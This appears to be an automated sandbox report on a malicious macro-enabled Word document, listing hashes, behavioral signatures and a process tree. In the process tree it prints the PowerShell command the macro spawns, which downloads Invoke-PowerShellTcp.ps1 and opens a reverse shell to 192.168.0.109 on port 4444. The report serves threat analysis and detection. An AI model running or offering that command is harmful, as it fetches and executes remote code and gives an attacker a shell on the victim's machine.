Analysis

  • max time kernel
    105s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-es
  • resource tags

    arch:x64arch:x86image:win7-20230220-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    30-03-2023 09:35

General

  • Target

    DOCUMENTO DE EJEMPLO -.docm

  • Size

    76KB

  • MD5

    ffc30716b9d1a573c91baecc7c78dd11

  • SHA1

    e0bd9f5b1e8360778466f6e66a8f1b5104dae1ea

  • SHA256

    36efb55ec131f10035c95424d1352b564989af80d8a8a8580434a6528e2bc6e9

  • SHA512

    dfc3df6ea5191b38eb2f2d524d4374ad1eca7225a0ec9f6f165caf54436c2359b241e6262d845a33b4cfe8596bece076527f4dd3529f3838acfccf2f6477bd30

  • SSDEEP

    1536:ZoRFzjY13RQIcS1TIF0Ide4Pyc7orwTUSfxouET8j:eRZc8ATIF0Ide4PyZSfX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.0.109/Invoke-PowerShellTcp.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DOCUMENTO DE EJEMPLO -.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -exec bypass -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.109/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.0.109 -Port 4444
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1104
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1708

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1104-67-0x0000000002470000-0x00000000024B0000-memory.dmp
      Filesize

      256KB

    • memory/1104-69-0x0000000002470000-0x00000000024B0000-memory.dmp
      Filesize

      256KB

    • memory/1104-68-0x0000000002470000-0x00000000024B0000-memory.dmp
      Filesize

      256KB

    • memory/1104-74-0x0000000002470000-0x00000000024B0000-memory.dmp
      Filesize

      256KB

    • memory/1992-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB